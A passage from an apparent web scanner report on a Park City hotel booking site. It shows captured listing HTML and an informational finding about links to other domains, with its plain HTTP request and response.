php?group_id=982&cloneID=41&catID=103&eventID=1386&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1386]); ><img src="http://s3.amazonaws.com/book_direct_images/l_88eb84a3441f85a2f3a5d33a2f622cad.jpg" title="Best Western Holiday Hills"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1456&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1456]); ><img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" title="Hampton Inn & Suites Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1449&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1449]); ><img src="http://s3.amazonaws.com/book_direct_images/l_7c07d47816e4f15128abada8b5d05924.jpg" title="Newpark Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1427&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1427]); ><img src="http://s3.amazonaws.com/book_direct_images/l_00d97fe26b5df107dcb4fff4abf524f3.jpg" title="Silver King Hotel"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=38674&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',38674]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a75817cf46b015b0ada26f94b8671ba2.jpg" title="The Trace Bed & Breakfast"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1419&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1419]); ><img src="http://s3.amazonaws.com/book_direct_images/l_181b9155b3a729276978989bd94512f1.jpg" title="Chateau Apres"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1492&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1492]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4481362da4bc35517e632ff665d87379.jpg" title="Kamas Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1394&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1394]); ><img src="http://s3.amazonaws.com/book_direct_images/l_ceeb1a473a01bf9e407c24f353e25294.jpg" title="Aspens Ski Condo Rentals"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1443&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1443]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4737531affac3ba0cc95a9a060e1629d.jpg" title="The Treasure Mountain Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1472&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1472]); ><img src="http://s3.amazonaws.com/book_direct_images/l_83adc03df48457d6f265ad6d3a7772fd.jpg" title="Three Kings Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1384&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1384]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5e5e0e7a36afd90ba3dbda2fb1903686.jpg" title="Park City Lodging, Inc."></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1424&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1424]); ><img src="http://s3.amazonaws.com/book_direct_images/l_48ac0a67bd4711885228fc52a881ef28.jpg" title="Park City Marriott"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',43865]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1456]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1456]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176193]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176196]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175974]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175627]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176194]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176197]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176229]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175975]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176198]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176192]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',43867]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1456]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1456]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175981]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175973]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175982]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div id="page_footer" style="padding-bottom:25px; color:#444; font-size:11px;"><a href="http://www.jackrabbitsystems.com/" target="_blank" style="color:#444; font-size:11px;"><img src="http://www.jackrabbitsystems.com/images/trip_images/powered_by_jackrabbit.png" name="powered_by_img" id="powered_by_img" style="border:none;"></a>
...[SNIP]...

5.3. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:45:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9t0ctthop4uht0ali5bi14eg22; path=/
Connection: close
Content-Length: 364745


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
</title>
                   <link rel="stylesheet" type="text/css" href="http://www.prod.bookdirect.net/css/smoothness/jquery-ui-1.7.2.custom.css" />
                   
                                       <link rel="stylesheet" type="text/css" href="/css/parkcity_template.css" />
                                       
                   <script src="http://maps.google.com/maps?file=api&amp;v=2.109&amp;key=ABQIAAAAKZm_5hsUqOpv5DxPV4HooBROL83n-bgKgORxim6v55hn_ZaBnxSpV4rEbp2tOu1bjGh1t-gicIUDyw" type="text/javascript"></script>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/8fa9e98acf5e2b247caa70669df6c903.png' title='Parking' alt='Parking' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Parking']); toggle_amenity('4', 'aa5d43508b4cec0724f75af8ae868ca6.png', '8fa9e98acf5e2b247caa70669df6c903.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/1fc82576cbb0bcebaf66b495707dd675.png' title='Shuttle Service' alt='Shuttle Service' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Shuttle Service']); toggle_amenity('1', '4a91a9bdeccb5f084339608bb1039e67.png', '1fc82576cbb0bcebaf66b495707dd675.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/90d28b770896393a5d24deaa76adf104.png' title='Pets Allowed' alt='Pets Allowed' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Pets Allowed']); toggle_amenity('31', '9ce03aac14ae7f31e817e122d6f60bd4.png', '90d28b770896393a5d24deaa76adf104.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/45a53ad2386da6db59cbd753481a4ceb.png' title='Swimming Pool' alt='Swimming Pool' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Swimming Pool']); toggle_amenity('6', '73a521715679621c1f544cd26c6075d0.png', '45a53ad2386da6db59cbd753481a4ceb.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/071c76db840ec89a0ee32b4e813b2f88.png' title='Fitness Room' alt='Fitness Room' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Fitness Room']); toggle_amenity('2', '686566e8aaab6172c31b1f6b470c6e3b.png', '071c76db840ec89a0ee32b4e813b2f88.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_7' 